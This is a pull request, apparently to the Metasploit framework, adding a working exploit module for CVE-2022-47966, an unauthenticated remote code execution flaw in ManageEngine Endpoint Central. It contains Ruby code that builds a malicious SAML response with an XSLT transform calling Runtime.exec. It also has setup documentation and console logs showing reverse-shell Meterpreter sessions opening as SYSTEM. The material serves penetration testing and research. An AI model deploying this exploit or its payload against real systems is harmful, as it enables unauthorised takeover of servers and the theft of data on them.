### PR TITLE
ManageEngine Endpoint Central RCE (CVE-2022-47966)

### DIFF
--- a/documentation/modules/exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.md
+++ b/documentation/modules/exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.md
@@ -1,0 +1,130 @@
+## Vulnerable Application
+This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP
+versions 10.1.2228.10 and below. See [ManageEngine security advisory](https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html).
+Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code
+by providing a crafted samlResponse XML to the Endpoint Central SAML endpoint.
+
+Note that the target is only vulnerable if SAML-based SSO is configured and active.
+
+## Installation
+
+### SAML 2.0 Identity Provider
+If you don't have an already SAML 2.0 Identity Provider (IdP), you can use this free one for testing: https://mocksaml.com/
+Download the IdP xml information by pressing the button `Download Metadata`.
+
+### Download the installers
+Go to https://archives.manageengine.com/, fill the form with any data and select ManageEngine Endpoint Central product
+with any version (e.g. 10.1.2228.10). You can then have access to all the versions and platform installers.
+After downloading the Windows Installer, launch the installer and select all the default options
+or make adjustments on the port you want to use by clicking Next.
+(you can skip the Registration for Technical Support part, it is optional).
+
+When the installation is done, select Start Endpoint Central Server and click Finish.
+This will start a browser and get you to the login page.
+
+### Enable SAML 2.0 SSO
+- Go to http://localhost:8020 or other port that you configured during the installation.
+- Log in as admin (default admin/admin)
+- Go to http://localhost:8020/webclient#/uems/admin/saml-configuration
+- Click on SAML Authentication at the ​​Global Settings menu at the left pane.
+
+In Identity Provider Details section:
+- Select `Other` option in the  `IdP provider` field
+- Provide a name in the `IdP name` field
+- Select `Username` option in the `ID Name` field
+- Select the `Metadata` radio button in the `Configuration by uploading` field
+- And last but not least upload the downloaded xml configuration file from Mock SAML in the `Upload metadata` field
+- Click save and you are done
+
+## Verification Steps
+- [ ] Start `msfconsole`
+- [ ] use `exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966`
+- [ ] set `LHOST` with target IP
+- [ ] set `LPORT` with target port
+- [ ] set `TARGET` with `0` (Windows EXE dropper) or `1` (Windows Command)
+- [ ] `exploit`
+
+You should get a `shell` or `meterpreter` session depending on the target and payload settings.
+
+**Note:** `Windows Defender` might get in the way, depending on the version your are running so disable it on your Windows Machine.
+The same applies for `Windows Defender Firewall` if you can not access the  application. Your port might be blocked.
+
+In the test cases below, ManageEngine Endpoint Central version `10.1.2228.5` was tested on Microsoft Server 2019 Standard
+with Windows Defender disabled otherwise all standard payloads will fail.
+
+## Options
+
+### TARGETURI
+The Endpoint Central SAML endpoint URL. Set to `/SamlResponseServlet` by default.
+
+### DELAY
+This sets the number of seconds to wait between each request. It is
+particularly useful when using a big payload with the `cmdstager` (Target 0),
+which requires sending multiple requests to the target. Endpoint Central has an
+anti-DoS mechanism that blocks the source IP address if requests are sent too
+fast. This option is set to 5 seconds by default, which seems to be a safe
+value.
+
+## Scenarios
+
+### Endpoint Central version 10.1.2228.5 - Target 1 (Windows Command)
+```
+msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > set rhosts 192.168.100.58
+rhosts => 192.168.100.58
+msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. SAML-based SSO is enabled.
+[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
+[*] Sending stage (175686 bytes) to 192.168.100.58
+[*] Meterpreter session 1 opened (192.168.100.7:4444 -> 192.168.100.58:55450) at 2023-01-29 07:19:10 +0000
+
+meterpreter > sysinfo
+Computer        : WIN-BJDNH44EEDB
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > shell
+Process 4100 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.17763.107]
+(c) 2018 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\DesktopCentral_Server\bin>
+```
+### Endpoint Central version 10.1.2228.5 - Target 0 (Windows EXE dropper)
+```
+msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. SAML-based SSO is enabled.
+[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
+[*] Command Stager progress -  17.01% done (2046/12025 bytes)
+[*] Command Stager progress -  34.03% done (4092/12025 bytes)
+[*] Command Stager progress -  51.04% done (6138/12025 bytes)
+[*] Command Stager progress -  68.06% done (8184/12025 bytes)
+[*] Command Stager progress -  84.24% done (10130/12025 bytes)
+[*] Sending stage (200774 bytes) to 192.168.100.58
+[*] Command Stager progress - 100.00% done (12025/12025 bytes)
+[*] Meterpreter session 3 opened (192.168.100.7:4444 -> 192.168.100.58:55489) at 2023-01-29 07:22:47 +0000
+
+meterpreter > shell
+Process 7364 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.17763.107]
+(c) 2018 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\DesktopCentral_Server\bin>
+```
+
+## Limitations
+No limitations identified.

--- a/documentation/modules/exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.md
+++ b/documentation/modules/exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.md
@@ -4,7 +4,7 @@ versions 10.1.2228.10 and below. See [ManageEngine security advisory](https://ww
 Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code
 by providing a crafted samlResponse XML to the Endpoint Central SAML endpoint.
 
-Note that the target is only vulnerable if SAML-based SSO is configured and active.
+Note that the target is only vulnerable if SAML-based SSO is configured and enabled.
 
 ## Installation
 

--- a/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
@@ -21,13 +21,13 @@ class MetasploitModule < Msf::Exploit::Remote
           (Apache Santuario version 1.4.1), it is possible to execute arbitrary
           code by providing a crafted `samlResponse` XML to the Endpoint Central
           SAML endpoint. Note that the target is only vulnerable if it is
-          configured with SAML-based SSO , and the service should active.
+          configured with SAML-based SSO , and the service should be active.
         },
         'Author' => [
           'Khoa Dinh', # Original research
           'horizon3ai', # PoC
           'Christophe De La Fuente', # Based on the original code of the ServiceDesk Plus Metasploit module
-          'h00die-gr3y' # Added some small tweaks to the original code of Christophe to make it work for this target
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Added some small tweaks to the original code of Christophe to make it work for this target
         ],
         'License' => MSF_LICENSE,
         'References' => [

--- a/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
@@ -1,0 +1,206 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine Endpoint Central Unauthenticated SAML RCE',
+        'Description' => %q{
+          This exploits an unauthenticated remote code execution vulnerability
+          that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10
+          and below (CVE-2022-47966). Due to a dependency to an outdated library
+          (Apache Santuario version 1.4.1), it is possible to execute arbitrary
+          code by providing a crafted `samlResponse` XML to the Endpoint Central
+          SAML endpoint. Note that the target is only vulnerable if it is
+          configured with SAML-based SSO , and the service should active.
+        },
+        'Author' => [
+          'Khoa Dinh', # Original research
+          'horizon3ai', # PoC
+          'Christophe De La Fuente', # Based on the original code of the ServiceDesk Plus Metasploit module
+          'h00die-gr3y' # Added some small tweaks to the original code of Christophe to make it work for this target
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-47966'],
+          ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],
+          ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],
+          ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']
+        ],
+        'Platform' => [ 'win' ],
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_dropper,
+              'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_command,
+              'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 8443,
+          'SSL' => true
+        },
+        'DefaultTarget' => 1,
+        'DisclosureDate' => '2023-01-10',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE,],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),
+      OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])
+    ])
+  end
+
+  def check_saml_enabled
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/SamlRequestServlet')
+    })
+    if res.nil?
+      print_error('No response from target.')
+      return false
+    end
+
+    # ManageEngine Endpoint Servers with SAML enabled respond with 302 and a HTTP header Location: containing the SAML request
+    if res && res.code == 302 && res.headers['Location'].include?('SAMLRequest=')
+      return true
+    else
+      return false
+    end
+  end
+
+  def check
+    # check if SAML-based SSO is enabled otherwise exploit will fail
+    # No additional fingerprint / banner information available to collect and determine version
+    return Exploit::CheckCode::Safe unless check_saml_enabled
+
+    CheckCode::Detected('SAML-based SSO is enabled.')
+  end
+
+  def encode_begin(real_payload, reqs)
+    super
+
+    reqs['EncapsulationRoutine'] = proc do |_reqs, raw|
+      raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw
+    end
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded)
+    when :windows_dropper
+      execute_cmdstager(delay: datastore['DELAY'])
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    if target['Type'] == :windows_dropper
+      cmd = "cmd /c #{cmd}"
+    end
+    cmd = cmd.encode(xml: :attr).gsub('"', '')
+
+    assertion_id = "_#{SecureRandom.uuid}"
+    # Randomize variable names and make sure they are all different using a Set
+    vars = Set.new
+    loop do
+      vars << Rex::Text.rand_text_alpha_lower(5..8)
+      break unless vars.size < 3
+    end
+    vars = vars.to_a
+    saml = <<~EOS
+      <?xml version="1.0" encoding="UTF-8"?>
+      <samlp:Response
+        ID="_#{SecureRandom.uuid}"
+        InResponseTo="_#{Rex::Text.rand_text_hex(32)}"
+        IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">
+        <samlp:Status>
+          <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
+        </samlp:Status>
+        <Assertion ID="#{assertion_id}"
+          IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion">
+          <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer>
+          <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+            <ds:SignedInfo>
+              <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+              <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
+              <ds:Reference URI="##{assertion_id}">
+                <ds:Transforms>
+                  <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+                  <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">
+                    <xsl:stylesheet version="1.0"
+                      xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
+                      xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                      <xsl:template match="/">
+                        <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/>
+                        <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/>
+                        <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/>
+                        <xsl:value-of select="$#{vars[2]}"/>
+                      </xsl:template>
+                    </xsl:stylesheet>
+                  </ds:Transform>
+                </ds:Transforms>
+                <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
+                <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue>
+              </ds:Reference>
+            </ds:SignedInfo>
+            <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue>
+            <ds:KeyInfo/>
+          </ds:Signature>
+        </Assertion>
+      </samlp:Response>
+    EOS
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'vars_post' => {
+        'SAMLResponse' => Rex::Text.encode_base64(saml)
+      }
+    })
+
+    unless res&.code == 200
+      lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)
+      unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }
+        elog("Unkown error returned:\n#{lines.join("\n")}")
+        fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code}). See logs for details.")
+      end
+      fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)')
+    end
+
+    res
+  end
+
+end


### PR DESCRIPTION
This exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10 and below. See CVE-2022-47966 and [ManageEngine security advisory](https://www.manageengine.com/security/advisory/CVE/cve-2022-47966.html). 
Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the Endpoint Central SAML endpoint. Note that the target is only vulnerable if  SAML-based SSO is configured and enabled.

The code base used in this module is largely the same based on the work of [Christophe De La Fuente](https://github.com/cdelafuente-r7) for the [ManageEngine ServiceDesk Plus RCE](https://github.com/rapid7/metasploit-framework/pull/17527). I have made a few updates to make this exploit work based on different behavior (HTTP responses) of the target and the fact that the application is only supported on Windows.

## Installation

### SAML 2.0 Identity Provider

If you don't have an already SAML 2.0 Identity Provider (IdP), you can use this free one for testing: https://mocksaml.com/
Download the IdP xml information by pressing the button `Download Metadata`.

### Download the installers

Go to https://archives.manageengine.com/, fill the form with any data and select ManageEngine Endpoint Central product with any version (e.g. 10.1.2228.10). You can then have access to all the versions and platform installers.
After downloading the Windows Installer, launch the installer and select all the default options or make adjustments on the port you want to use by clicking Next (you can skip the Registration for Technical Support part, it is optional). 

When the installation is done, select Start Endpoint Central Server and click Finish.
This will start a browser and get you to the login page.

### Enable SAML 2.0 SSO

- Go to http://localhost:8020 or other port that you configured during the installation.
- Log in as admin (default admin/admin)
- Go to http://localhost:8020/webclient#/uems/admin/saml-configuration
- Click on SAML Authentication at the ​​Global Settings menu at the left pane.

In Identity Provider Details section:
- Select `Other` option in the  `IdP provider` field
- Provide a name in the `IdP name` field
- Select `Username` option in the `ID Name` field
- Select the `Metadata` radio button in the `Configuration by uploading` field
- And last but not least upload the downloaded xml configuration file from Mock SAML in the `Upload metadata` field
- Click save and you are done

## Verification Steps

- [ ] Start `msfconsole`
- [ ] use `exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966`
- [ ] set `LHOST` with target IP
- [ ] set `LPORT` with target port
- [ ] set `TARGET` with `0` (Windows EXE dropper) or `1` (Windows Command)
- [ ] `exploit`

You should get a `shell` or `meterpreter` session depending on the target and payload settings.

**Note:** `Windows Defender` might get in the way, depending on the version your are running so disable it on your Windows Machine.  The same applies for `Windows Defender Firewall` if you can not access the  application. Your port might be blocked.

In the test cases below, I tested ManageEngine Endpoint Central version `10.1.2228.5` on Microsoft Server 2019 Standard with Windows Defender disabled otherwise all standard payloads will fail.

## Scenarios

### Endpoint Central version 10.1.2228.5 - Target 1 (Windows Command)
```
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > set rhosts 192.168.100.58
rhosts => 192.168.100.58
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > set lhost 192.168.100.7
lhost => 192.168.100.7
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Windows Command for cmd/windows/powershell/meterpreter/reverse_tcp
[*] Sending stage (175686 bytes) to 192.168.100.58
[*] Meterpreter session 1 opened (192.168.100.7:4444 -> 192.168.100.58:55450) at 2023-01-29 07:19:10 +0000

meterpreter > sysinfo
Computer        : WIN-BJDNH44EEDB
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 4100 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\DesktopCentral_Server\bin>
```
### Endpoint Central version 10.1.2228.5 - Target 0 (Windows EXE dropper)
```
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (200774 bytes) to 192.168.100.58
[*] Command Stager progress - 100.00% done (12025/12025 bytes)
[*] Meterpreter session 3 opened (192.168.100.7:4444 -> 192.168.100.58:55489) at 2023-01-29 07:22:47 +0000

meterpreter > shell
Process 7364 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\DesktopCentral_Server\bin>
```

